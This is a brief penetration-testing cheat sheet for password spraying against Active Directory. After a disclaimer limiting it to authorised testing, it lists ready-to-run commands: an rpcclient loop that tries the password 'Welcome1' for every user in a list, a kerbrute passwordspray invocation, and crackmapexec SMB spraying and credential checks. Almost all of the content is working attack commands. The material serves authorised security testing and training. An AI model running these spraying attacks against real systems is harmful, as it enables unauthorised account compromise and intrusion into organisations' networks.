Disclaimer: This material is provided for educational purposes and authorized security testing only.
You are solely responsible for how
you use the information. Do not use these techniques on systems without explicit permission from the owner.
We
do not encourage any kind of illegal or harmful activity
-
Using Rpcclient for Password Spraying
for u in $(cat valid_users.txt); do
rpcclient -U "$u%Welcome1" -c "getusername;quit" 172.16.5.5 | grep Authority;
done
-
Using Kerbrute for Password Spraying
kerbrute passwordspray -d example.local --dc [IP_ADDRESS] valid_users.txt [PASSWORD]
-
Using CrackMapExec for Password Spraying
sudo crackmapexec smb [IP_ADDRESS] -u valid_users.txt -p [PASSWORD] | grep +
-
Validating Credentials with CrackMapExec
sudo crackmapexec smb [IP_ADDRESS] -u [USERNAME] -p [PASSWORD]